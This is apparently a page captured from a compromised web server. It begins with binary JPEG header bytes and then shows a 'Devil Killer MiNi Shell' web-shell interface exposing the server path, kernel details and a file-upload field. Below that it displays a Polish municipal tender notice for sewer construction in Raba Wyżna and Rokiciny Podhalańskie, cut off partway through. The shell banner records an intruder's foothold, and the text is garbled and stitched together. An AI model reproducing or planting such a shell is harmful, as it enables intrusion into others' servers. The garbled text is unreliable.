JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220303/0007456702-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa kanalizacji sanitarnej w miejscowościach<br/> Raba Wyżna, Rokiciny Podhalańskie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Raba Wyżna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491892647</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">-</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Raba Wyżna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-721</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">182691250</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">182691251</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@rabawyzna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rabawyzna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa kanalizacji sanitarnej w miejscowościach<br/> Raba Wyżna, Rokiciny Podhalańskie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-53e37600-9ad5-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00074567</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00023906/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa kanalizacji sanitarnej w miejscowościach Raba Wyżna, Rokiciny Podhalańskie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-zp.rabawyzna.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Adres strony internetowej służący<br/>do elektronicznego składania ofert: https://e-zp.rabawyzna.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający dopuszcza kontakt poprzez środek komunikacji elektronicznej:<br/>• drogą elektroniczną (z wyłączeniem składania ofert):<br/>przetargi@rabawyzna.pl (pojemność jednej wiadomości na skrzynce - do 20 MB)<br/>• poprzez Platformę, dostępną pod adresem: https://e-zp.rabawyzna.pl/.<br/>Korespondencja między zamawiającym a wykonawcą odbywać się będzie w formie elektronicznej lub<br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Wymagania techniczne, które muszą spełniać urządzenia informatyczne w celu korzystania z systemu<br/>teleinformatycznego opisane zostały na stronie internetowej pod adresem:<br/>https://pomoc.e-zp.finn.pl/pomoc/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016 z późniejszymi zmianami), dalej „RODO”, informujemy, że: <br/> • W przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu w trakcie trwania postępowania czy realizacji umowy na: Budowa kanalizacji sanitarnej w miejscowościach Raba Wyżna, Rokiciny Podhalańskie, Pani/Pana danych osobowych, przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego właściwego w sprawach ochrony danych osobowych.<br/> • Podanie przez Panią/Pana danych osobowych jest obowiązkowe, gdyż przesłankę przetwarzania danych osobowych stanowi przepis prawa, Pani/Pan dane mogą być przetwarzane w sposób zautomatyzowany i nie będą profilowane.<br/> • administratorem Pani/Pana danych osobowych jest Wójt Gminy Raba Wyżna z siedzibą <br/>w Urzędzie Gminy, <br/>adres: 34-721 Raba Wyżna 41 <br/>tel.: 18 26 91 250; <br/>e-mail: urzad@rabawyzna.pl<br/>strona internetowa: www.rabawyzna.pl <br/>BIP: www.bip.rabawyzna.pl<br/> • w sprawach z zakresu ochrony danych osobowych może się Pan/Pani kontaktować z wyznaczonym przez administratora Inspektorem Ochrony Danych e-mail: iod.ug@rabawyzna.pl;<br/> • Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego Budowa kanalizacji sanitarnej w miejscowościach Raba Wyżna, Rokiciny Podhalańskie, o numerze referencyjnym ZP.271.4.2022 prowadzonym w trybie podstawowym;<br/> • odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; <br/> • Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres co najmniej 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli zobowiązania wskazane w ofercie i umowie przekroczą w/w przedział czasowy, okres przechowywania obejmuje ten termin; <br/> • obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/> • w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/> • posiada Pani/Pan:<br/> • na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/> • na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/> • na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust.2 RODO; <br/> • prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> • nie przysługuje Pani/Panu:<br/> • w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> • prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> • przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/> • na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna RODO zgodnie z zapisami w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Głównym celem budowy kanalizacji sanitarnej w miejscowościach Raba Wyżna, Rokiciny<br/>Podhalańskie jest budowa sięgaczy bocznych do kanału głównego. Powyższa budowa składa<br/>się z wykonania:<br/>Dla części I zamówienia:<br/> 1) Kanału bocznego CB6 – CBB4; CBB1 – r1; CB1 - CBA2;<br/> 2) Kanału bocznego CE7 – CE7-3;<br/> 3) Kanału bocznego CL9 – CLB2;<br/> 4) Kanału bocznego CL11 – CLC4;<br/> 5) Kanału bocznego C16 – CD1 – CD2;<br/> 6) Kanału bocznego C21 – CF3.2;<br/> 7) Kanału bocznego C30 – CH12; CH5 - CHA10;<br/> 8) Kanału bocznego C33 – CJ6;<br/> 9) Kanału bocznego CL5 - CLA1;<br/> 10) Kanału bocznego C11 - CC3;<br/> 11) Kanału bocznego G1 - G40;<br/> 12) Kanału bocznego G1 - H1-2;<br/> 13) Kanału bocznego G23 - GE4; G27 - GHA1;<br/> 14) Kanału bocznego G24 - GG12;<br/> 15) Kanału bocznego G17 - GD17;<br/>16) Wykonanie tablicy informacyjnej wraz z zamontowaniem na słupkach stalowych wymiar 120x 80 cm: 1 kpl.<br/>2. Łączna długość Kanału (część I) - 4035,5 mb fi 200<br/>3. Roboty budowlane powinny zostać wykonane zgodnie z treścią: SWZ, wyjaśnień do SWZ oraz jej modyfikacji, Opisem przedmiotu zamówienia który stanowi załącznik nr 2 do SWZ, przedmiaru robót, który stanowi załącznik nr 10 do SWZ, projektu budowlanego kanału głównego i kanałów bocznych który stanowi załącznik nr 11, pozwolenia na budowę, które stanowi załącznik nr 12 do SWZ, profili podłużnych kanałów, które stanowią załącznik nr 13 do SWZ, parametrów pompy i studni, które stanowią załącznik nr 14 do SWZ oraz z zestawieniem studzienek (Raba Wyżna, Rokiciny Podhalańskie) stanowiącym załącznik nr 15 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie punktowej będą podlegać jedynie oferty nie podlegające odrzuceniu. Zamawiający wyznaczył następujące kryteria oceny ofert :<br/>Cena – 60%<br/>Deklarowany okres gwarancji - 40 %.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Deklarowany okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Głównym celem budowy kanalizacji sanitarnej w miejscowościach Raba Wyżna, Rokiciny Podhalańskie jest budowa sięgaczy bocznych do kanału głównego. Powyższa budowa składa się z wykonania:<br/>Dla części II zamówienia:<br/> 1) Kanału bocznego C44 – CN6; C36 – CK8;<br/> 2) Kanału bocznego C47 – CO18; CO14 – N1;<br/> 3) Kanału bocznego C67 - CS4;<br/> 4) Kanału bocznego C64 - CR1;<br/> 5) Kanału Głównego C49 – C67;<br/> 6) Kanał bocznego H1 - H14; H10 - HE6; H6 - HD2; H5 – HC8; H2-HA3;<br/> 7) Wykonanie tablicy informacyjnej wraz z zamontowaniem na słupkach stalowych wymiar 120 x 80 cm: 1 kpl.<br/>2. Łączna długość Kanału (część II) - 2180,1 mb fi 200<br/>3. Roboty budowlane powinny zostać wykonane zgodnie z treścią: SWZ, wyjaśnień do SWZ oraz jej modyfikacji, Opisem przedmiotu zamówienia który stanowi załącznik nr 2 do SWZ, przedmiaru robót, który stanowi załącznik nr 10 do SWZ, projektu budowlanego kanału głównego i kanałów bocznych który stanowi załącznik nr 11, pozwolenia na budowę, które stanowi załącznik nr 12 do SWZ, profili podłużnych kanałów, które stanowią załącznik nr 13 do SWZ, parametrów pompy i studni, które stanowią załącznik nr 14 do SWZ oraz z zestawieniem studzienek (Raba Wyżna, Rokiciny Podhalańskie) stanowiącym załącznik nr 15 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie punktowej będą podlegać jedynie oferty nie podlegające odrzuceniu. Zamawiający wyznaczył następujące kryteria oceny ofert :<br/>Cena – 60%<br/>Deklarowany okres gwarancji - 40 %.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Deklarowany okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1. Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3. Sytuacji ekonomicznej lub finansowej:<br/>a) Dla części I zamówienia:<br/>1) Wykonawca wykaże dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 1 000 000,00 zł (słownie: jeden milion złotych 00/100);<br/>2) Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową nie mniejszą niż 30% wartości oferty, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>b) Dla części II zamówienia:<br/>1) Wykonawca wykaże dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 500 000,00 zł (słownie: pięćset tysięcy złotych 00/100).<br/>2) Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową nie mniejszą niż 30% wartości oferty, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>4. Zdolności technicznej lub zawodowej:<br/>a) Dotyczący doświadczenia wykonawcy dla części I i II zamówienia (w przypadku gdy wykonawca składa ofertę na dwie części zamówienia wykonawca może wskazać te same dowody w zakresie tego wymogu): Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 1 robotę budowlaną w zakresie kanalizacji sanitarnej o wartości nie mniejszej niż 500 000,00 zł (słownie: pięćset tysięcy złotych 00/100);<br/>• Okresy wyrażone w latach liczy się wstecz od dnia w którym upływa termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu.<br/>b) Dotyczący potencjału osobowego wykonawcy dla części I i II zamówienia (w przypadku gdy wykonawca składa ofertę na dwie części zamówienia wykonawca może wskazać ten sam potencjał osobowy dla każdej z części): Wykonawca spełni warunek jeżeli przedstawi że dysponuje minimum jedną osobą, która pełniła będzie funkcję kierownika robót posiadającą:<br/>• uprawnienia budowlane do kierowania robotami budowlanymi w specjalności wodno-kanalizacyjnej.<br/>Przez uprawnienia budowlane Zamawiający rozumie uprawnienia wydane zgodnie z  ustawą z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U. z 2016r., poz. 65),<br/>• doświadczenie w pełnieniu funkcji kierownika robót w specjalności wodno-kanalizacyjnej - przy realizacji co najmniej jednej inwestycji polegającej na budowie sieci kanalizacyjnej o wartości robót min. 100 000,00 zł brutto (słownie: sto tysięcy złotych 00/100). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na brak podstaw wykluczenia z postępowania Wykonawca składa oświadczenie dotyczące 